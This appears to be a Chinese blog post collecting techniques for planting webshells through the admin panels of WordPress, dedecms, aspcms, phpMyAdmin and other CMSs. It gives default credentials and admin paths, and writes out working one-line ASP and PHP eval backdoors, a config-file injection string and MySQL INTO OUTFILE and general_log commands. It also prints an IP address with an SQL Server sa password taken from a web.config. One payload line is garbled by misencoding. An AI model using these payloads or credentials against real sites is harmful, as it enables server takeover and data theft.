常见的CMS后台getshell姿势总结

本文涉及的产品
日志服务 SLS,月写入数据量 50GB 1个月
简介: 常见的CMS后台getshell姿势总结

WordPress

默认后台登录地址

/wp-login.php   /wp-admin

登录后在外观的编辑里面找一个模板,我们在404模板 (404.php)里面写入一句话后门

可以蚁剑连接

上传一个压缩包主题,压缩包里面有一句话木马,网站自解压后我们可以getshell

dedecms

默认密码为admin admin

系统默认管理路径是dede

在后台的文件式管理器上传后门,目录uploads/1.php

在主页模板里加上PHP代码,然后在更新主页HTML中将首页的文件名后缀改为php

通过广告插入PHP任意代码,目录是/plus/ad_js.php?aid=8

注意这里不能将cmd通过引号括起来,因为会被转义时添加\导致getshell失败

aspcms

默认登录地址Admin_aspcms

ASP 文件通常包含 HTML 标签,就像 HTML 文件。然而,ASP 文件也能包含服务器脚本,这些脚本被分隔符 <% 和 %> 包围起来。

第一个getshell的地方是幻灯片,内容会保存在配置文件\config\AspCms_Config.asp里面

bp抓包修改slidestyle为99,在配置文件里面成功发现修改成功

闭合前面,并写入一句话木马

1%><%eval request(chr(35))%><%进行url(key编码)

1%25><%25eval+request(chr(35))%25><%25

南方数据企业系统

常量设置内加入后门

在目录\Inc\Const.asp

添加新闻处通过00截断上传文件(%00通过url解码,并且将文件填充大量无意义的字符以达到正常的文件大小防止被限制)

连接蚁剑

将网页信息中的联系邮箱改为下面的代码

smtp.163.com"%><%eval request(chr(35))%><% s="

Const JMailOutFrom = "smtp.163.com"%><%eval request(chr(35))%><% s=""

虽然报错500,但是仍然能连接上webshell

phpmyadmin日志

into outfile 把后门写到网站目录上

select '<?php phpinfo();eval($_POST[cmd]);?>' into outfile 'D:/www/a.php'

利用mysql日志文件写shell,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell

1. SET global general_log = "ON"; 日志保存状态开启;
2. SET global general_log_file ='D:/WWW/a.php'; 修改日志的保存位置。

此时目录下创建了a.php文件,我们通过查询将一句话写入日志文件,写入后门后可以getshell

select '<?php phpinfo(); ?>';

pageadmin

默认登录地址/admin/login/

上传含有webshell的压缩包,解压后得到webshell

目录管理器 查找web.config 里面有数据库的连接信息

用菜刀远程连接SQLserver192.168.10.142  _H6psv8Fmr2C7mvsF6qkGnE

1. <T>ADO</T>
2. <C>Driver={Sql Server};Server=192.168.10.142;Database=master;Uid=sa;Pwd=_H6psv8Fmr2C7mvsF6qkGnE</C>

无忧企业系统

1.修改白名单后缀,然后直接上传脚本

2.普通用户留言,后台回复

攠數畣整爠煥敵瑳∨

访问数据库的目录,webshell的密码是a

相关实践学习
日志服务之使用Nginx模式采集日志
本文介绍如何通过日志服务控制台创建Nginx模式的Logtail配置快速采集Nginx日志并进行多维度分析。
目录
相关文章
|
2月前
|
安全 前端开发 UED
除了wordpress CMS外,还有什么CMS值得我们使用?
作为建站的小白,前端不会开发、后台不会编写,用CMS来搭建网站是最理想的建站方式,经过线上的站长推荐,我认识了wordpress CMS,来自国外的一套CMS,使用上非常方便,熟悉时间不需要太长,也能快速进入建站的过程。
|
20天前
|
前端开发 搜索推荐 安全
你用过最好的CMS网站管理系统?
本文主要介绍了内容管理系统(CMS)的概念、功能和使用场景。CMS是一种位于WEB前端和后端管理前端内容的软件系统,用于发布、修改、审批、发布内容。文章提到,内容管理系统在满足个性化需求和提高工作效率方面有显著优势。
|
SQL 安全 关系型数据库
phpMyAdmin后台Getshell总结
phpMyAdmin后台Getshell总结
426 1
|
Web App开发 XML 安全
DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
DedeCMS存在文件包含漏洞导致后台getshell,攻击者可通过该漏洞获取目标服务器控制权限,进行深度利用。
565 1
|
弹性计算 安全
dedecms上传漏洞uploadsafe.inc.php 整理
自从买了阿里云的ecs 之后每次出现漏洞阿里云盾就会通知,前段时间部署的项目检测出上传漏洞 根据网上大神们的博客整理了下,下面这个是可行的 dedecms上传漏洞uploadsafe.inc.php,这里整理了大神们对于这个漏洞的解释
111 0
|
弹性计算 关系型数据库 MySQL
使用 DedeCMS 快速搭建 CMS 网站 | 学习笔记
快速学习 使用 DedeCMS 快速搭建 CMS 网站
227 0
 使用 DedeCMS 快速搭建 CMS 网站 | 学习笔记
|
域名解析 弹性计算 网络协议
使用 PHPCMS 快速搭建 CMS 网站 | 学习笔记
快速学习 使用 PHPCMS 快速搭建 CMS 网站
352 0
使用 PHPCMS 快速搭建 CMS 网站 | 学习笔记
|
SQL 存储 安全
【WEB安全】PHPMyAdmin后台GetShell姿势总结(下)
【WEB安全】PHPMyAdmin后台GetShell姿势总结
464 0
【WEB安全】PHPMyAdmin后台GetShell姿势总结(下)
|
SQL 安全 关系型数据库
【WEB安全】PHPMyAdmin后台GetShell姿势总结(上)
【WEB安全】PHPMyAdmin后台GetShell姿势总结
558 0
【WEB安全】PHPMyAdmin后台GetShell姿势总结(上)
|
安全 前端开发 关系型数据库
网站漏洞扫描 某CMS代码的越权与install.php重置漏洞
客户网站前端时间被攻击,网站被劫持到了赌博网站上去,通过朋友介绍找到我们SINESAFE做网站的安全防护,我们随即对客户网站进行了全面的渗透测试,包括了网站的漏洞检测与代码安全测试,针对于发现的漏洞进行了修复,包括网站安全部署等等方面,下面我们将这一次的安全应急处理过程分享给有需要的客户。
209 0
网站漏洞扫描 某CMS代码的越权与install.php重置漏洞

热门文章

最新文章